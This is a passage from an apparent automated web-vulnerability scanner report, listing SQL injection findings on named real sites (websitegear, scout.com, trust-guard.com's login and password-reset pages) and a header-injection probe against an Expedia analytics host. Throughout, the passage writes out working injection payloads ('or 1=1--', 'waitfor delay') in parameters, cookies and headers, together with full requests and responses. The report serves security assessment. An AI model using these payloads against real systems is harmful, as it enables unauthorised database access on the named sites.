GET /b'/ss/expedia1/1/H.9-Pdvu-2/s9923706686589?[AQB]&ndh=1&t=6/4/2011%2022%3A42%3A16%205%20300&ce=ISO-8859-1&cdp=2&pageName=page.Hotels&g=http%3A//www.expedia.com/Hotels&r=http%3A//www.expedia.com/pub/agent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D3%26mnth%3D5/1/2011%26rgst%3D%250D%250Ans%3Anetsparker056650%3Dvuln%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429&ch=hotels&server=www.expedia.com&c2=hotels&v2=hotels&c12=80312807c795402e93c5016d2a2a3e1b&v17=page.Hotels&v18=page.Hotels&c34=842_1%7C975_0&v34=842_1%7C975_0&c50=E3.20110401&pid=50053&pidt=1&oid=http%3A//www.expedia.com/Hotels&ot=A&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: om.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/Hotels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s1=`0; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s_sess=%20s_sq%3Dexpedia1%253D%252526pid%25253D50053%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/Hotels%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B%20s_cc%3Dtrue%3B

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 23:12:00 GMT
Server: Omniture DC/2.0.0
Content-Length: 434
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/expedia1/1/H.9-Pdvu-2/s9923706686589 was not f
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/expedia1/1/H.9-Pdvu-2/s9923706686589?[AQB]&ndh=1&t=6/4/2011%2022%3A42%3A16%205%20300&ce=ISO-8859-1&cdp=2&pageName=page.Hotels&g=http%3A//www.expedia.com/Hotels&r=http%3A//www.expedia.com/pub/agent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D3%26mnth%3D5/1/2011%26rgst%3D%250D%250Ans%3Anetsparker056650%3Dvuln%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429&ch=hotels&server=www.expedia.com&c2=hotels&v2=hotels&c12=80312807c795402e93c5016d2a2a3e1b&v17=page.Hotels&v18=page.Hotels&c34=842_1%7C975_0&v34=842_1%7C975_0&c50=E3.20110401&pid=50053&pidt=1&oid=http%3A//www.expedia.com/Hotels&ot=A&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: om.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/Hotels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s1=`0; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s_sess=%20s_sq%3Dexpedia1%253D%252526pid%25253D50053%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/Hotels%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B%20s_cc%3Dtrue%3B

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 23:12:00 GMT
Server: Omniture DC/2.0.0
xserver: www391
Content-Length: 0
Content-Type: text/html

2.12. http://poll.websitegear.com/compactpoll.asp [pollID parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://poll.websitegear.com
Path:   /compactpoll.asp

Issue detail

The pollID parameter appears to be vulnerable to SQL injection attacks. The payloads 18614847%20or%201%3d1--%20 and 18614847%20or%201%3d2--%20 were each submitted in the pollID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /compactpoll.asp?pollID=1842018614847%20or%201%3d1--%20 HTTP/1.1
Host: poll.websitegear.com
Proxy-Connection: keep-alive
Referer: http://www.scout.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 19:31:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 98
Content-Type: text/html; Charset=utf-8
Set-Cookie: ASPSESSIONIDSACSQBTS=AFHAMOBCGELDLCGBGJFDMJMG; path=/
Cache-control: private

An error occurred on the server when processing the URL. Please contact the system administrator.

Request 2

GET /compactpoll.asp?pollID=1842018614847%20or%201%3d2--%20 HTTP/1.1
Host: poll.websitegear.com
Proxy-Connection: keep-alive
Referer: http://www.scout.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:31:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html; Charset=utf-8
Set-Cookie: ASPSESSIONIDSACSQBTS=GFHAMOBCCFJPFMGMGBOLLEJL; path=/
Cache-control: private

2.13. http://recruiting.scout.com/Legacy/a.z [cfg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /Legacy/a.z

Issue detail

The cfg parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the cfg parameter. The application took 20121 milliseconds to respond to the request, compared with 844 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /Legacy/a.z?s=143&p=26&cfg=22'waitfor%20delay'0%3a0%3a20'--&fromprefetch=1 HTTP/1.1
Host: recruiting.scout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __utmz=153805115.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; __utma=153805115.1232119317.1303509265.1303509265.1303516031.2; SessionBrandId=0; __utma=202704078.454375544.1303509265.1304731683.1304736111.6; __utmc=202704078; __utmb=202704078.1.10.1304736111

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 21:44:32 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 21:54:12 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 12006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
2.14. https://secure.trust-guard.com/ [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmb cookie. The application took 27759 milliseconds to respond to the request, compared with 225 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET / HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384')waitfor%20delay'0%3a0%3a20'--

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:59:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5139
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
2.15. https://secure.trust-guard.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ,0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter. The application took 25261 milliseconds to respond to the request, compared with 225 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /?1,0,0,0)waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:16:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
2.16. https://secure.trust-guard.com/ResetPassword.php [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the Referer HTTP header. The application took 51643 milliseconds to respond to the request, compared with 170 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /ResetPassword.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=',0)waitfor%20delay'0%3a0%3a20'--
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:37:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3716
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
2.17. https://secure.trust-guard.com/ResetPassword.php [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the User-Agent HTTP header. The application took 52381 milliseconds to respond to the request, compared with 170 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /ResetPassword.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24')waitfor%20delay'0%3a0%3a20'--
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:31:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3716
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
2.18. https://secure.trust-guard.com/ResetPassword.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter. The application took 50215 milliseconds to respond to the request, compared with 170 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /ResetPassword.php?1',0)waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:11:07 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3716
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
2.19. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Issue detail

The txtEmail parameter appears to be vulnerable to SQL injection attacks. The payloads 19587081'%20or%201%3d1--%20 and 19587081'%20or%201%3d2--%20 were each submitted in the txtEmail parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /ResetPassword.php HTTP/1.1
Referer: https://secure.trust-guard.com/ResetPassword.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.trust-guard.com
Cookie: PHPSESSID=uh9nm4eto59nfd5fii6haostd4
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 43

txtEmail=19587081'%20or%201%3d1--%20&btnSubmit=Submit&btnCancel=Cancel

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:59:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
<title>Trust Guard Login</title>

<script type="text/javascript">
//<![CDATA[
document.getElementsByTagName('html')[0].className='jsOn';
//]]>

function TemplateOnUnload()
{

}
</script>


</head>
<body style="background-color:#cccccc" onunload="TemplateOnUnload()">

<div style="text-align: center">
<center>
<table style="width: 1020px; background-color: white;" border="1" bordercolor="#000000" cellpadding="0" cellspacing="0">
<tr>
<td style="background-image:url(/images/controlpanel-header.jpg); background-color:Black; background-repeat:no-repeat; height:50px; width:900px; vertical-align: text-bottom; text-align: right" colspan="2">
</td>
</tr>
<tr>
<td align="center" style="vertical-align: middle; height: 23px;"></td>
</tr>

<tr>
<td>
<br />
<center>

<div style="border-right: #000000 thin solid; border-top: #000000 thin solid; border-left: #000000 thin solid;
width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;">


<form id="content:content" method="post" style="margin:0px" action="index.php">
<br /><br />
<script type="text/javascript">

function validateForm()
{
var message;
var nouser = (!validatePresent(document.getElementById('txtEmail'),'msg_user'));
var nopass = (!validatePresent(document.getElementById('txtPassword'),'msg_pass'));
if (nouser && nopass)
message = 'Please enter a username and a password.';
else if (nouser)
message = 'Please enter a username.';
else if (nopass)
message = 'Please enter a password.';

...[SNIP]...

Request 2

POST /ResetPassword.php HTTP/1.1
Referer: https://secure.trust-guard.com/ResetPassword.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.trust-guard.com
Cookie: PHPSESSID=uh9nm4eto59nfd5fii6haostd4
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 43

txtEmail=19587081'%20or%201%3d2--%20&btnSubmit=Submit&btnCancel=Cancel

Response 2

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:59:14 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3795
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
<title>Reset Password</title>

<script type="text/javascript">
//<![CDATA[
document.getElementsByTagName('html')[0].className='jsOn';
//]]>

function TemplateOnUnload()
{

}
</script>


</head>
<body style="background-color:#cccccc" onunload="TemplateOnUnload()">

<div style="text-align: center">
<center>
<table style="width: 1020px; background-color: white;" border="1" bordercolor="#000000" cellpadding="0" cellspacing="0">
<tr>
<td style="background-image:url(/images/controlpanel-header.jpg); background-color:Black; background-repeat:no-repeat; height:50px; width:900px; vertical-align: text-bottom; text-align: right" colspan="2">
</td>
</tr>
<tr>
<td align="center" style="vertical-align: middle; height: 23px;"></td>
</tr>

<tr>
<td>
<br />
<center>

<div style="border-right: #000000 thin solid; border-top: #000000 thin solid; border-left: #000000 thin solid;
width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;">


<form method="post" style="margin:0px">

Enter you email address or site name below and click Submit and we will send you a new password<br />
<input id="txtEmail" name="txtEmail" type="text" value="19587081' or 1=2-- " style="width:300px" onblur="validatePresent(this,'msg_email');" /><br />
<div id="msg_email">&nbsp;</div>
<span style="color:Red">
<span id='lblResult' >Could not find an account will the site 19587081' or 1=2-- .</span> </span>
<br />
<input id='btnSubmit' name='btnSubmit' type="submit" value="Submit"
onclick="return validatePresent(document.getElementById('php:txtEm
...[SNIP]...
2.20. https://secure.trust-guard.com/index.php [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /index.php

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmb cookie. The application took 24998 milliseconds to respond to the request, compared with 6249 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /index.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/ResetPassword.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
